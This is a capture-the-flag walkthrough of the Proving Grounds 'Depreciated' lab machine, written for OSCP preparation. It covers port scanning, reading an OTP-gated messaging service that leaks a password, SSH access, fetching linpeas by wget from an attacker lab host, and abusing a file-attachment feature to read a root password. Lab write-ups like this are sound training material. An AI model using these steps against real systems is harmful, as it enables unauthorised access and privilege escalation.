Proving grounds:Depreciated

Today we will take a look at Proving grounds: Depreciated. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

• Network scan

└─# nmap -Pn -p- -sS --min-rate 10000 -oN nmap/quick 192.168.168.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 14:00 EST
Nmap scan report for 192.168.168.170
Host is up (0.15s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5132/tcp open  unknown
8433/tcp open  unknown

• Web (80)

When we look at the source code, we see that there is a Graphql implementation on port 8433.

• Graphql

To list users

• Ssh (Peter)

In order to connect to port 5132, an otp code is additionally required.

└─# nc -nv 192.168.168.170 5132
(UNKNOWN) [192.168.168.170] 5132 (?) open
Enter Username: peter
Enter OTP: 

Now, We have an OTP code

Let’s connect to the port.

└─# nc -nv 192.168.168.170 5132
(UNKNOWN) [192.168.168.170] 5132 (?) open
Enter Username: peter
Enter OTP: ysvdzoSdDjcY1gYo
$ help

list    list messages
create  create new message
exit    exit the messaging system
read    read the message with given id
update  update the message with given id
help    Show this help
                    
$ list
#2345           Improve the ticketing CLI syst
#1893           Staging keeps on crashing beca
#2347           [critical] The ticketing websi
#1277           Update the MySQL version, it's
#234            Hey, Please change your passwo
#0              Hey, Seriously this is getting

$ read 234
Message No: #234

Hey, Please change your password ASAP. You know the password policy, using weak password isn't allowed. And peter@safe is very weak, use https://password.kaspersky.com/ to check the strength of the password.

Attachment: none

After taking the password, we log in with ssh.

• Privesc

peter@depreciated:~$ wget 192.168.49.168/linpeas.sh

peter@depreciated:~$ bash linpeas.sh

I started Linpeas and found some interesting files in the folder.

peter@depreciated:/opt/depreciated/messaging$ cat messages.py

bu, sistemdən mesajınıza əlavə faylı əlavə etməyə və proqram əlavələri yazmağa imkan verir

def create_message(user):
    for_ = input("for: ")
    description = input("Description: ")
    num = random.randint(1000, 9999)
    author = user
    attachment = input("File: ")

    if attachment and attachment != "none" and os.path.exists(attachment):
        with open(attachment, 'r') as f:
            data = f.read()
        basename = '/opt/depreciated/' + os.path.basename(attachment)

        with open(basename, 'w') as f:
            f.write(data)
    else:
        attachment = "none"
    msg_info = {'id': num, 'author': author, 'description': description, 'for': for_, 'attachment': attachment}
    MESSAGES.append(msg_info)

    with open("/opt/depreciated/messaging/msg.json", 'w') as f:
         json.dump(MESSAGES, f)

I wanted to check out a file that I don’t have permission to.

└─# nc -nv 192.168.168.170 5132                        
(UNKNOWN) [192.168.168.170] 5132 (?) open
Enter Username: peter
Enter OTP: kZNr4NDL4BgvnZfu
$ create
for: peter
Description: test
File: /opt/depreciated/messaging/msg.json

There is a password in the text here, I understand that it is the root password

peter@depreciated:/opt/depreciated$ su root
Password: 
root@depreciated:/opt/depreciated# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@depreciated:/opt/depreciated# 

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”